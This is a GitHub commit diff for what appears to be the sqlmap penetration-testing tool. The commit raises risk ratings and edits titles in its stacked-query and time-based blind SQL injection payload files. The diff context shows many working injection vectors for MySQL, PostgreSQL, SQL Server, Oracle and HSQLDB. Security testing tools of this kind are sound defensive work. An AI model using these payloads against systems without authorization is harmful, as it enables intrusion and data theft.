Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 3b3205c

Browse files
bdamelebdamele
committed
Minor stacked queries and time-based payloads cleanup - issue #1169 
1 parent 79d4d97 commit 3b3205c

2 files changed

Lines changed: 30 additions & 29 deletions

File tree

xml/payloads/04_stacked_queries.xml

Lines changed: 11 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66
<title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
77
<stype>4</stype>
88
<level>2</level>
9-
<risk>0</risk>
9+
<risk>1</risk>
1010
<clause>0</clause>
1111
<where>1</where>
1212
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@@ -26,7 +26,7 @@
2626
<title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
2727
<stype>4</stype>
2828
<level>4</level>
29-
<risk>0</risk>
29+
<risk>1</risk>
3030
<clause>0</clause>
3131
<where>1</where>
3232
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@@ -47,7 +47,7 @@
4747
<title>MySQL &gt; 5.0.11 stacked queries</title>
4848
<stype>4</stype>
4949
<level>1</level>
50-
<risk>0</risk>
50+
<risk>1</risk>
5151
<clause>0</clause>
5252
<where>1</where>
5353
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
@@ -88,7 +88,7 @@
8888
<title>PostgreSQL &gt; 8.1 stacked queries</title>
8989
<stype>4</stype>
9090
<level>1</level>
91-
<risk>0</risk>
91+
<risk>1</risk>
9292
<clause>0</clause>
9393
<where>1</where>
9494
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@@ -129,7 +129,7 @@
129129
<title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
130130
<stype>4</stype>
131131
<level>4</level>
132-
<risk>0</risk>
132+
<risk>1</risk>
133133
<clause>0</clause>
134134
<where>1</where>
135135
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@@ -151,7 +151,7 @@
151151
<title>Microsoft SQL Server/Sybase stacked queries</title>
152152
<stype>4</stype>
153153
<level>1</level>
154-
<risk>0</risk>
154+
<risk>1</risk>
155155
<clause>0</clause>
156156
<where>1</where>
157157
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@@ -173,7 +173,7 @@
173173
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
174174
<stype>4</stype>
175175
<level>5</level>
176-
<risk>0</risk>
176+
<risk>1</risk>
177177
<clause>0</clause>
178178
<where>1</where>
179179
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
@@ -213,7 +213,7 @@
213213
<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
214214
<stype>4</stype>
215215
<level>5</level>
216-
<risk>0</risk>
216+
<risk>1</risk>
217217
<clause>0</clause>
218218
<where>1</where>
219219
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
@@ -233,7 +233,7 @@
233233
<title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
234234
<stype>4</stype>
235235
<level>5</level>
236-
<risk>0</risk>
236+
<risk>1</risk>
237237
<clause>0</clause>
238238
<where>1</where>
239239
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
@@ -295,7 +295,7 @@
295295
<title>HSQLDB &gt;= 1.7.2 stacked queries</title>
296296
<stype>4</stype>
297297
<level>3</level>
298-
<risk>0</risk>
298+
<risk>1</risk>
299299
<clause>0</clause>
300300
<where>1</where>
301301
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
@@ -316,7 +316,7 @@
316316
<title>HSQLDB &gt;= 2.0 stacked queries</title>
317317
<stype>4</stype>
318318
<level>4</level>
319-
<risk>0</risk>
319+
<risk>1</risk>
320320
<clause>0</clause>
321321
<where>1</where>
322322
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>

xml/payloads/05_time_blind.xml

Lines changed: 19 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -207,7 +207,7 @@
207207
<title>Microsoft SQL Server/Sybase time-based blind</title>
208208
<stype>5</stype>
209209
<level>1</level>
210-
<risk>0</risk>
210+
<risk>1</risk>
211211
<clause>0</clause>
212212
<where>1</where>
213213
<vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@@ -931,12 +931,13 @@
931931
<!-- TODO: if possible, add payload for Microsoft Access -->
932932
<!-- End of OR time-based blind tests -->
933933

934-
<!-- Time-based tests - After ORDER BY...LIMIT... -->
934+
<!-- Time-based tests - LIMIT clause -->
935+
<!-- This payload does not work with SLEEP() -->
935936
<test>
936-
<title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
937+
<title>MySQL &gt;= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
937938
<stype>5</stype>
938939
<level>3</level>
939-
<risk>1</risk>
940+
<risk>2</risk>
940941
<clause>1,2,3,4,5</clause>
941942
<where>1</where>
942943
<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
@@ -951,7 +952,7 @@
951952
<dbms_version>&gt; 5.0.11</dbms_version>
952953
</details>
953954
</test>
954-
<!-- Time-based tests - After ORDER BY...LIMIT... -->
955+
<!-- Time-based tests - LIMIT clause -->
955956

956957
<!-- Time-based blind tests - Parameter replace -->
957958
<test>
@@ -1177,7 +1178,7 @@
11771178
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
11781179
<stype>5</stype>
11791180
<level>3</level>
1180-
<risk>0</risk>
1181+
<risk>1</risk>
11811182
<clause>1,3</clause>
11821183
<where>3</where>
11831184
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
@@ -1351,9 +1352,9 @@
13511352
<!-- End of time-based blind tests - Parameter replace -->
13521353

13531354

1354-
<!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
1355+
<!-- Time-based blind tests - GROUP BY and ORDER BY clause -->
13551356
<test>
1356-
<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
1357+
<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clause</title>
13571358
<stype>5</stype>
13581359
<level>3</level>
13591360
<risk>1</risk>
@@ -1373,7 +1374,7 @@
13731374
</test>
13741375

13751376
<test>
1376-
<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
1377+
<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
13771378
<stype>5</stype>
13781379
<level>4</level>
13791380
<risk>2</risk>
@@ -1392,7 +1393,7 @@
13921393
</test>
13931394

13941395
<test>
1395-
<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
1396+
<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clause</title>
13961397
<stype>5</stype>
13971398
<level>3</level>
13981399
<risk>1</risk>
@@ -1412,7 +1413,7 @@
14121413
</test>
14131414

14141415
<test>
1415-
<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
1416+
<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
14161417
<stype>5</stype>
14171418
<level>4</level>
14181419
<risk>2</risk>
@@ -1431,7 +1432,7 @@
14311432
</test>
14321433

14331434
<test>
1434-
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
1435+
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>
14351436
<stype>5</stype>
14361437
<level>3</level>
14371438
<risk>1</risk>
@@ -1473,10 +1474,10 @@
14731474
</test>
14741475

14751476
<test>
1476-
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
1477+
<title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_LOCK.SLEEP)</title>
14771478
<stype>5</stype>
14781479
<level>3</level>
1479-
<risk>0</risk>
1480+
<risk>1</risk>
14801481
<clause>2,3</clause>
14811482
<where>1</where>
14821483
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
@@ -1492,7 +1493,7 @@
14921493
</test>
14931494

14941495
<test>
1495-
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
1496+
<title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
14961497
<stype>5</stype>
14971498
<level>3</level>
14981499
<risk>1</risk>
@@ -1511,7 +1512,7 @@
15111512
</test>
15121513

15131514
<test>
1514-
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
1515+
<title>Oracle time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
15151516
<stype>5</stype>
15161517
<level>4</level>
15171518
<risk>2</risk>
@@ -1530,7 +1531,7 @@
15301531
</test>
15311532

15321533
<test>
1533-
<title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
1534+
<title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
15341535
<stype>5</stype>
15351536
<level>4</level>
15361537
<risk>2</risk>
@@ -1551,7 +1552,7 @@
15511552
</test>
15521553

15531554
<test>
1554-
<title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
1555+
<title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
15551556
<stype>5</stype>
15561557
<level>4</level>
15571558
<risk>2</risk>

0 commit comments

Comments
 (0)